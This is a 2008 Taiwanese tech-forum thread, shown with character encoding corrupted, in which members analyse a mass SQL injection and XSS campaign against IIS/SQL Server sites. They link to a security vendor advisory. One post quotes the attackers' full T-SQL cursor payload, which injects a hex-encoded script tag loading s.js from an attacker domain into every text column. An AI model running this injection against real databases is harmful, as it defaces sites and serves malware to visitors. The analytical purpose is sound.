PCDVD¼Æ¦ì¬ì§Þ°Q½×°Ï

PCDVD¼Æ¦ì¬ì§Þ°Q½×°Ï (https://www.pcdvd.com.tw/index.php)
-   ¤C¼L¤K¦Þ²§¨¥°ó (https://www.pcdvd.com.tw/forumdisplay.php?f=12)
-   -   ª`·N¦Û¤vªººô­¶¬O§_¤]³Q¤J«I.... (https://www.pcdvd.com.tw/showthread.php?t=796417)

foxtm 2008-05-28 04:31 PM

¤Þ¥Î:
§@ªÌhakken
...³o¥u¬O¦b¤å¦r¦ê¤º¶ë¤JHTML tagªº¤@ºØcode injection¡Asql injection¤£¬O³o¼Ë¡I
sql injection¤£¥u¬Owindows·|¦³ªº¡I¼g§@¤£¨}ªºweb application³£·|¦³³o¼Ëªº¦MÀI¡C


¤p§Ì»{¬°¦³¤K¦¨ªº¥i¯à¬O SQL Injection ..
¦]¬°¥Ñ¼Ó¥D´£¨ÑªººI¹Ï¬Ý¨Ó..¸ê®Æ®w¤º¤w¸g³Q update ¹L¦Ó¶ë¤J¤F java script¤F ..
©Ò¥H¨C­Ó®a±Ú¦WºÙ¤U­±³£¥X²{­«½Æ©Êªº java script code ..

«ö·ÓºI¹Ï§PÂ_..¦ü¥G¸Ó°Q½×°Ï¨t²Î¦³Àɪºjava scriptªº¼Ë¤l..©Ò¥HÁÙ¬O¬Ý±o¨ì code ..
(²{¦b¤u§@¾÷¬O¶]xp¤£´±¥h³s :p .. ¦^®a´«linux¾÷¾¹¦A³s¨ì¸Óºô¯¸¸Õ¸Õ¬Ý..)
¦pªG¬O¦³¤ß¤H¥h¯d¨¥ª©¤º­«½Æ¶Kcodeªº¸Ü..
À³¸Ó·|¦bµo²{¦³¾×¦íscriptªº±¡ªp¤U°±¤î¶Kªº°Ê§@..©Ò¥H§Ú»{¬°¬O¤w¸g¬}±x¸ê®Æ®wÄæ¦ìªº SQL Injection ..
¦Ó¤£¬O³æ¯Âªº¶K¤å¶ëcodeªºcode injection..

¥t¥~¥H¥L½¯©µªº±¡ªp¦Ó¨¥..
§Ú»{¬°¬O°w¹ï¯S©wªº¯d¨¥ª©¨t²Î¶i¦æ§ðÀ»ªº..
³]©wµ{¦¡¥h¶]..§ì¨ì¬O¯S©w¯d¨¥ª©¨t²Î®É´N¥ÎSQL Injection¶ëcode¶i¥h..

¤£¹L²{¶¥¬q¬O¬Ý¹Ï»¡¬G¨Æ..¤@¤Á³£³£ÁÙ¬O¤p§Ìªº²q´ú°Õ..
±ß¤W¦^®a´«linuxªº¾÷¾¹¦b³s¹L¥h¬Ý¬Ý..

ashin037 2008-05-28 04:44 PM

¨â¦~«e¬[phpbb®É´N³Q¶ë¹L¤F..orz|||

chk 2008-05-28 05:05 PM

SQL Injection ªº§t·N«Ü¼s§a..
¤£¹L³o­Ó¬Ý¨Ó¬O³æ¯Âªº¦b¯d¨¥ª©ªº¦a¤è¶ë¤Jscript»yªk,¤£¨£±o­n¥Î¨ìSQL »yªk
¦pªG¯d¨¥ª©¨S¦³¹ï¤º®e°µ¤@¨ÇÅçÃҩΧPÂ_,´N·|µo¥Í³oºØª¬ªp
·íµM¥i¥H¤USQL Injection ªº¸Ü,µ²ªG´N¤£¥u¬Oºô­¶³Q¶ëscript¤F...
·d¤£¦nDB³£³Q¬å¤F

Devil 2008-05-28 05:35 PM

XSS Attack?SQL Injection?
¤p§Ìªº¬Ýªk¬OXSS Attack,SQL Injectionªº¸Ü,¤£·|¬O¥u¶ñ¤J³o¨Ç¸ê®Æ¦Ó¤w
ª½±µ±Nºô¯¸ªº¾ã­ÓDB Drop±¼³£¥i¥H
¥tSQL Injection or XSS Attack,³£¤£¶È­­©óWindows+IIS¥­¥x
¤j²¤»¡¤@¤U,XSS Attack¬OÂǥѿé¤JScript©óºô­¶¤W,ÅѨúÂsÄý¸Óºô­¶ªº¨Ï¥ÎªÌªºCookie¸ê®Æ
SQL Injection¬O§Q¥ÎSQL »yªk§ðÀ»ºô¯¸«áºÝªºDB
¦U¦ì¥i¥H¤Wgoogle°Ñ¦Ò¤@¤UXSS§ðÀ»
¦³¿ù½Ð«ü±Ð

Devil 2008-05-28 06:04 PM

¸É¥R.XSS Attack ¤£¥²¸g¥ÑSQL Injection
¨Ò¦p,§Ú²{¦b¦b¯d¨¥®É,¥i¥HÂǥѴ¡¤J¤@­Ó¹Ï¤ù®I¤U¤@¬qjava script¤F
©Ò¥H¨¾¨îªº¤èªk¥i¥H¬O,ServerºÝªºµ{¦¡§PÂ_¯d¨¥¤º®e¬O§_¦³¤£À³¸Ó¥X²{ªº¦r¦ê

foxtm 2008-05-28 06:32 PM

¤Þ¥Î:
§@ªÌDevil
XSS Attack?SQL Injection?
¤p§Ìªº¬Ýªk¬OXSS Attack,SQL Injectionªº¸Ü,¤£·|¬O¥u¶ñ¤J³o¨Ç¸ê®Æ¦Ó¤w
ª½±µ±Nºô¯¸ªº¾ã­ÓDB Drop±¼³£¥i¥H

¦]¬°¥Lªº¥Øªº¬O´²¼· s.js ¦Ó¤£¬O·d«±ºô¯¸..
©Ò¥H¶ñ¤J³o¨Ç¦r¦ê´Nºïºï¦³¾l¤F..§âtable drop±¼¥u¬O¾É­Pºô¯¸ÅõºÈ..
­°§C´²¼½³t«×½}¤F :(
¤Þ¥Î:
§@ªÌDevil
¥tSQL Injection or XSS Attack,³£¤£¶È­­©óWindows+IIS¥­¥x
¤j²¤»¡¤@¤U,XSS Attack¬OÂǥѿé¤JScript©óºô­¶¤W,ÅѨúÂsÄý¸Óºô­¶ªº¨Ï¥ÎªÌªºCookie¸ê®Æ
SQL Injection¬O§Q¥ÎSQL »yªk§ðÀ»ºô¯¸«áºÝªºDB
¦U¦ì¥i¥H¤Wgoogle°Ñ¦Ò¤@¤UXSS§ðÀ»
¦³¿ù½Ð«ü±Ð

©Ò¥H¥i¯à¬O XSS Attack ²V¦X SQL Injection §ðÀ» ..
§Q¥Î SQL Injection ±Nºô¯¸¤º®e­È¤J java script «á..
¨Ï¥ÎªÌ¥ÎÂsÄý¾¹ÂsÄý®É°õ¦æ¸Ó¬q script ¾É­P XSS Attack ..
¤ì°¨ÂǦ¹¶i¤J¨Ï¥ÎªÌ¹q¸£..¨Ã¥B©óÂsÄý¾¹ÂsÄý¨ä¥Lºô¯¸®É..·|¹Á¸Õ¦³µL SQL Injection º|¬}Ä~Äò´²¼½..
¦]¦¹µo¥Í«e¤å pkopko ¥S´£¨Ñªºª¬ªp..²M±¼«á·|¤@ª½´_µo..¥B¤º¥~ºô¬Ò¤¤¼Ð..
¬Ò»F¦]©ó¤º³¡¨Ï¥ÎªÌ¤¤¤ì°¨¤F..«o¨S¦³µo²{¦Ó¦p±`ªº¨Ï¥Î¤½¥q¤º¥~ºô¯¸ :(

·íµM°Õ :) ~~ ³oÁÙ¬O¬Ý¹Ï»¡¬G¨Æ :p ...
¶È¨Ñ°Ñ¦Ò..¦³¿ùÅwªï¥Î¤O¦R¯ó~~

foxtm 2008-05-29 02:43 AM

¤Þ¥Î:
§@ªÌ³¥¤f¶©¥v
³o¬O°w¹ïiisªºsql¥N½Xª`¤J§ðÀ»
¥uµo¥Í¦bwindows¥­¥x¤W¡A¥Ø«e¥þ¥@¬É¤wª¾³Q§ðÀ»ªººô¯¸¤w¸g¶W¹L50¸U¤F

³¥¤f¥S»¡¹ï¤F..¬O SQL Injection ¨S¿ù..¤£·\¬Oªø´Á¦bÃö¤ß¬ÛÃö¸ê°Tªº°ª¤â :)
­è­è°lÂܤF script «á.. ¥Î¤@¨ÇÃöÁä¦r¥h¬d¤§«á¤j­P¤F¸Ñ±¡ªp¤F..
¬OÄÝ©ó SQL Injection + XSS + 0day ²V¦X§ðÀ»«¬ªº..
(0day¬O«ü¦b¦w¥þ¸É¤Bµo§G«e¦Ó³Q¤F¸Ñ©M´x´¤ªºº|¬}¸ê°T¡C)

SQL Injection ¨Ï¥Îªº Code ¦p¤U..
¤Þ¥Î:
§@ªÌSQL Injection Code
dEcLaRe @t vArChAr(255),@c vArChAr(255)
dEcLaRe tAbLe_cursoR cUrSoR FoR
exec(¡¥UpDaTe [¡¦+@t+¡¥sElEcT a.nAmE,b.nAmE FrOm sYsObJeCtS a,sYsCoLuMnS b wHeRe a.iD=b.iD

AnD a.xTyPe=¡¥u¡¦ AnD (b.xTyPe=99 oR b.xTyPe=35 oR b.xTyPe=231 oR b.xTyPe=167)
oPeN tAbLe_cursoR fEtCh next FrOm tAbLe_cursoR iNtO @t,@c while(@@fEtCh_status=0)
bEgIn
exec(¡¥UpDaTe [¡¦+@t+¡¥] sEt [¡¦+@c+¡¥]=rtrim(convert(varchar,[¡¦+@c+¡¥]))+cAsT

(0x223E3C2F7469746C653E3C736372697074207372633D687474703A2F2F732E736565392E75732F732E6A733E3

C2F7363726970743E3C212D2D aS vArChAr(67))¡¦)
fEtCh next FrOm tAbLe_cursoR iNtO @t,@c
eNd
cLoSe tAbLe_cursoR
dEAlLoCaTe tAbLe_cursoR

§ðÀ»ªÌ«Ü²Ó¤ßªº¥Î¤F¤j¤p¼g¥æ¿ùÁ×¶}¤@¯ëµ{¦¡¤¤¹ïRequestªºÀˬd..
¹ïSQL Server¸ê®Æ®w¸Ì­±
xtype=99 ntext
xtype=35 text
xtype=231 nvarchar
xtype=167 varchar
¥|ºØ¸ê®Æ«¬ºA¶i¦æ update ..
¶ë¤Jªº¸ê®Æ¤Q¤»¶i¦ì¬°
0x223E3C2F7469746C653E3C736372697074207372633D687474703A2F2F732E736565392E75732F732E6A733E3
Âà´«¬°¦r¦ê§Y¬O"></title><script src=http://s.see9.us/s.js></script><!--
³o¸Ì¦A¦¸®i²{§ðÀ»ªÌªº²Ó¤ß =_= .. ¥Î¤Q¤»¶i¦ì¥N½X¨ú¥N®e©ö³Q§ì¨ìªº html script ..

¦]¬°¥D§ð sql server .. ©Ò¥H¬Ý°_¨Ó³£¬O IIS ¤¤¼Ð.. ²¦³º¤@¯ë«á¥x DB ·|¥Î sql server ªº±¡ªp¤U..«e¥x¤j³£¬O IIS + ASP (.NET) ..

±µ¤U¨Ó¨Ï¥Î XSS Attack Åýºô¯¸ÂsÄýªÌªºÂsÄý¾¹°õ¦æ§ðÀ»ªÌ¦w±Æªº Java Script ..
¥Î 0day Æpº|¬}¨ú±oºô¯¸ÂsÄýªÌ¥»¾÷¤@©wªºÅv­­..¤§«eªº0dayº|¬}¬O§ì real play ªº..
¦ý¥u­n§ðÀ»ªÌ°ª¿³..¥u­n´À´« script ÀH®É¥i¥H¥Î¨ä¥L 0day º|¬}§ðÀ»ÂsÄýªÌ¥»¾÷ ..

³Ì«á¬O§ðÀ»ªÌªº¥Øªº..
À³¸Ó¬O "ÂI¼s§i" .. §Q¥Î¤T­«¾÷¨î±N¤ì°¨¶Ç¼½¥X¥h¤§«á .. À°§ðÀ»ªÌÂIºô¸ô****ÁÈ¿ú :( ..

¤p§Ì¬O°Ñ¦Òºî¦X¨â¥÷¤j³°½×¾Â¸ê®Æ°µ¥Xªºµ²½×..
¬°§Kª½±µ³s±µ½×¾Âªº¦MÀI..©Ò¥H´£¨Ñ¨â¥÷Google ¤å¦r§Ö¨ú¨ÑªO¤Í­Ì°Ñ¦Ò ..
http://72.14.235.104/search?q=cache...x&gl=tw&strip=1
http://72.14.235.104/search?q=cache...l=zh-TW&strip=1

¶È¨Ñ°Ñ¦Ò..¦³¿ùÅwªï¥Î¤O¦R¯ó~~

foxtm 2008-05-29 03:03 AM

¨ä¹êÂI¶i³¥¤f¥Sªºavpclub½×¾Â
°¨¤W´N§ä¨ì¬ÛÃö¸ê°T¤F ^^||| ..¹ê¦b»á¦³¥Õ°µ¥\½Ò¤§·Pı..
http://www.avpclub.ddns.info/discuz...-10913-1-1.html
¤Þ¥Î:
§@ªÌAVPClubºô¸ô¦w¥þ½×¾Â STONE
¥xÆWºô¯¸¾D¨ü¦³¥v¥H¨Ó³Ì¤j³W¼ÒSQL Injection §ðÀ»
·s«¬ºAªºMass SQL Injection¦b¥x¤Wºt
¤º¦³¸Ô²Óªº§ðÀ»»¡©ú
¸ê®Æ¨Ó·½ªüº¿¬ì§Þ
½Ð°Ñ¦Ò¥H¤Uºô§}:http://www.armorize.com.tw/news/shownews.php?news=22

¥i¨ÑªO¤Í­Ì°Ñ¦Ò

hakken 2008-05-29 03:17 AM

foxtm²Ó¤ß¡I¯uªº¨ü±Ð¤F¡I¡I
³o¬Ocode injection, sql injectionªº²Õ¦X¨S¿ù¡I
¬Ý¹Ï»¡¸ÜªGµM½§²L¡A¤S¨ü±Ð¤F¤@¦¸¡I¡I
¤£¹L­n¬O¨Ï¥Îsql injection¡A´N­n²q¨ìtableªºÄæ¦ì¦WºÙ
©Ò¥H³oÀ³¸Ó¬O°w¹ï¤@¨Ç²{¦¨®M¸Ë(¦³«Ü¦h¬Oºô¸ô¤W¨ú±o§K¶Oªº)¨t²Îªº§ðÀ»§a¡I

chk 2008-05-29 08:33 AM

¬ÛÃö¸ê°T¦b³oùØ
http://www.armorize.com.tw/news/shownews.php?news=22
¤µ¤Ñ¤S¦³·sªº¸ê°T¥X¨Ó
http://www.armorize.com.tw/news/shownews.php?news=23

ªü½X¬ì§ÞASF™(Armorize Special Forces)¸ê¦w¹Î¶¤²`¤J¤ÀªR«á¡A©ó05¤ë20¤é³qª¾´CÅé¨Ãµo¥X·s»D½Z¡G

05202008 ¥xÆWºô¯¸¾D¨ü¦³¥v¥H¨Ó³Ì¤j³W¼ÒSQL Injection §ðÀ»--·s«¬ºAªºMass SQL Injection¦b¥x¤Wºt

·í®É§Ú­Ì©ó·s»D½Z¤¤«ü¥X¡A¡u±À´ú¥Ç¸o¶°¹Î¦b¶i¦æ¤j³W¼Òºô¯¸§G§½¡Aµ¥«Ý¤U¤@­ÓÂsÄý¾¹¹s®É®t§ðÀ»(Zero Day Attack) ¥X²{«á¤j¶q¦¬³Î¡C¡v

¦]¬°·í®ÉASF™¹Î¶¤¦b°lÂܹLµ{¤¤¤w¸gµo²{¡A¥Ç¸o¶°¹Î¦ü¥G¬G·N¤£Åý´c·N³sµ²µo¥Í¹ê»Ú®Ä¥Î¡A§G§½ªº·N¨ý¿@«p¡C

ASF™¹Î¶¤©ó05¤ë23¤é¶}©l¡Aµo²{Àb«È¶°¹Î¦b¨ä¤j³W¼ÒSQL Injection§ðÀ»¤¤¡A¶}©l±Ä¥Î§ðÀ»Adobe Flash¤§ºô°¨¡]malware¡^¡A¸g²`¤J¤ÀªR¡A»®µMµo²{¦¹¬°Adobe Flash ¤§¹s®É®t§ðÀ»¡]Zero Day Attack / 0day¡^¡I¦¹¦¸¤j³W¼Ò§ðÀ»¡A¦Û01¤ë¶}©l¦Ü¤µ¥¼°±¡A¥Ø«e¤S¥X²{·f°t¹s®É®t§ðÀ»¤âªk¡A³ôºÙ«e©Ò¥¼¦³¤§ÄY­«¤j³W¼Ò§ðÀ»¨Æ¥ó¡A¬G¸Ô­z¦p¤U¡C

[¥Î¤áºÝ¦w¥þ«ØÄ³ ]

¦¹¦¸¬°¹s®É®t§ðÀ»¡A¬G§Ú­Ì©ó05¤ë20¤½¥¬¤§[¥Î¤áºÝ¦w¥þ«ØÄ³]µL®Ä¡C°w¹ï¦¹¦¸§ðÀ»¡A§Ú­Ì«ØÄ³¼È®ÉÃö³¬Adobe Flash¡CÁöµM¦¹Á|·|³y¦¨³\¦hºô¯¸¦bÂsÄý®É¤§°ÝÃD¡AµM¦¹¬°¹s®É®t§ðÀ»¡A¥Ø«e¨ÃµL¨ä¥L¤èªk¡CIE¨Ï¥ÎªÌ¥i¦Û[¤u¨ã]¡÷ºÞ²zªþ¥[¤u¨ã¡A¨Ã°±¥Î"Shockwave Flash Object"¡CFirefox¥Î¤á¥i¥H§Q¥Îregedt32.exe(regedit.exe)§â CLSID ¤§ d27cdb6e-ae6d-11cf-96b8-444553540000³]¦¨ 1¡A¥H¼È®É°±¤îFlash¤§¹B§@¡C


©Ò¦³ªº®É¶¡§¡¬°GMT +8¡C ²{¦bªº®É¶¡¬O05:34 AM.

vBulletin Version 3.0.1
powered_by_vbulletin 2026¡C